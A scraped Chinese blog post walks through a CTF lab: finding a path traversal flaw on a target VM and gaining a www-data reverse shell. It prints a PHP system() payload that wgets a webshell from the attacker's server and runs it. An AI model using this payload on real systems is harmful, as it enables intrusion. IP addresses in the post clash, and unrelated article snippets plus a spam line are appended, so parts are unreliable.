• <noscript id="e0iig"><kbd id="e0iig"></kbd></noscript>
  • <td id="e0iig"></td>
  • <option id="e0iig"></option>
  • <noscript id="e0iig"><source id="e0iig"></source></noscript>
  • CTF練習:SQL注入之路徑遍歷(獲取www-data)

    標簽: CTF

    CTF練習:SQL注入之路徑遍歷(獲取www-data)


    靶機地址:
    鏈接: https://pan.baidu.com/s/1VODQKtxUrtLp8fl-v2x-bQ
    提取碼: og4g

    環境準備

    開啟兩臺機器,一臺靶機一臺kali攻擊機,配置好橋接網絡,使其在同一網段內。
    查看攻擊機kali的IP,為192.168.137.176
    在這里插入圖片描述
    查看靶機的IP,為192.168.137.176

    在這里插入圖片描述
    ping一下,測試連通性,沒問題,開始信息收集。
    在這里插入圖片描述

    信息收集

    探測靶場開放的端口信息與服務版本
    在這里插入圖片描述
    使用dirb對開放的80端口進行進一步挖掘
    在這里插入圖片描述
    發現一個疑似數據庫的頁面,打開鏈接。
    在這里插入圖片描述
    點擊test_db.php,進入了一個登錄頁面,嘗試一下弱口令admin,居然直接進去,看來這個不是考察點。
    這個頁面可以上傳shell,留著以后用。
    在這里插入圖片描述
    在這里插入圖片描述
    接著我們使用 owasp-zap 程序對網站進行漏洞掃描,看看是否存在別的可以用漏洞。
    在這里插入圖片描述
    發現了一個路徑遍歷漏洞
    在這里插入圖片描述
    復制漏洞鏈接放到瀏覽器,可以猜測它的作用就是執行畫圈中的語句。
    在這里插入圖片描述
    我們可以利用這個漏洞來執行我們上傳的shell文件。

    制作與上傳shell文件

    尋找shell文件,粘到桌面。
    在這里插入圖片描述
    改名為shell.php,并改好ip和端口。
    在這里插入圖片描述
    :
    去到數據庫后臺,上傳shell。
    新建一個數據庫,庫名為webshell.php
    在這里插入圖片描述
    新建一個表,表名為shell,字段為1。
    在這里插入圖片描述
    新建字段shell,類型為text,值為反彈shell代碼。

    <?php system("cd /tmp;wget http://172.168.137.176:8000/webshell.php;chmod +x webshell.php;php webshell.php");?>
    

    在這里插入圖片描述
    在這里插入圖片描述
    上傳shell成功。
    回到終端的桌面,開啟python服務器“SimpleHTTPServer”,它運行于8000端口,這也是為何我們的shell文件指向的是8000端口。
    在這里插入圖片描述
    開啟監視端口,監聽4444端口。
    在這里插入圖片描述
    去到路徑遍歷漏洞頁面,去執行shell文件。
    在這里插入圖片描述
    可以看到終端返回了shell。

    進入靶機

    這和sql系列文章大相徑庭,我就不贅述了,復制粘貼都懶了,哈哈。
    得到的還是www-data用戶,什么優化終端啊,感興趣的去我看之前的文章就行了。

    這次靶機主要是相關的sql注入練習,并沒有flag值,所以至此完工!!!

    版權聲明:本文為qq_43233085原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處鏈接和本聲明。
    本文鏈接:https://blog.csdn.net/qq_43233085/article/details/103325508

    智能推薦

    解決Pyinstaller打包numpy和pandas庫文件過大問題

    解決Pyinstaller壓縮numpy和pandas庫文件過大問題 文件包類型和網上的方法 Windows下docker的安裝 在docker下實現打包     今天是2021年的第一天,先祝各位小伙伴現年快樂哈。最近因為做了一個項目,需要打包文件,文件中包含了numpy和pandas庫,結果打包出來幾百行的代碼居然要900m,人都傻了,翻遍了全網找解決方...

    【混沌工程】基于ChaosBlade實現網絡故障模擬

    一、前言 很久之前曾基于linux內核自帶的TC和netem模擬一些公網中遇到的極端情況(延遲、丟包、重復、損壞和亂序等),驗證了我們傳輸程序的健壯性! 具體細節可見這篇老博客: https://blog.csdn.net/u013128262/article/details/84784663 最近在復現kafka生產端一個timeout異常場景時,發現之前方案時因為內核和OS版本問題有些差異而無...

    使用FileZilla連接時超時,無法連接到服務器

    用FileZilla連接服務器時,顯示錯誤: 解決方法: 檢查基本的內容 主機是否寫錯 端口是否自定義,默認21 檢查用戶名和密碼是否錯誤 如果連接的是公司內網 使用ping命令,測試一下是否能收到數據 收不到則需要開啟VPN,再ping,看是否能接收數據(請老鐵們用自己最合適的方法解決) 如果開啟VPN后能接收數據,則可以連接一下服務器,如果不行(怎么可能不行),則跳轉3并依次嘗試 開啟VPN后...

    反匯編:結構體拷貝傳參

    一、結構體拷貝傳參 二、引用和常引用傳參 三、大結構體做形參/數組拷貝...

    猜你喜歡

    羊城杯web(eazyphp)

    題目環境 file_put_contents() file_put_contents() 函數把一個字符串寫入文件中 構造payload 在 url 中傳參 蟻劍連接拿到flag...

    37種傳感器(十七)之有水銀開關模塊+Stduino Nano&UNO

    37種傳感器(十七)之有水銀開關模塊+Stduino Nano&UNO 本文轉載自:http://www.stduino.com/forum.php?mod=viewthread&tid=41&extra=page%3D1= 關鍵詞: 51、stm32、arduino、stduino單片機、stduino UNO&Nano、水銀開關模塊 說明: 水銀,即金屬&ldq...

    CentOS7設置Nginx開機自啟

    目錄 在/etc/init.d文件下創建nginx文件 修改nginx文件路徑 設置文件執行權限 將nginx服務加入到chkconfig中 設置開啟啟動 啟動nginx服務 查看是否設置成功 在/etc/init.d文件下創建nginx文件 vim /etc/init.d/nginx 添加以下腳本內容 修改nginx文件路徑 nginx=”/usr/local/nginx/sbin/...

    363. Max Sum of Rectangle No Larger Than K

    363. Max Sum of Rectangle No Larger Than K 最大矩形和不超過k 題目: 給定一個矩陣matrix和一個整數k,求元素加和不超過k的最大子矩形。 解題思路: 動態規劃。 我們使用暴力搜索。 定義sum[i][j]為矩形(0,0)-(i,j)的和;然后我們遍歷這個矩形中的所有的子矩形,計算它與k的大小,并更新結果。 代碼:...

    精品国产乱码久久久久久蜜桃不卡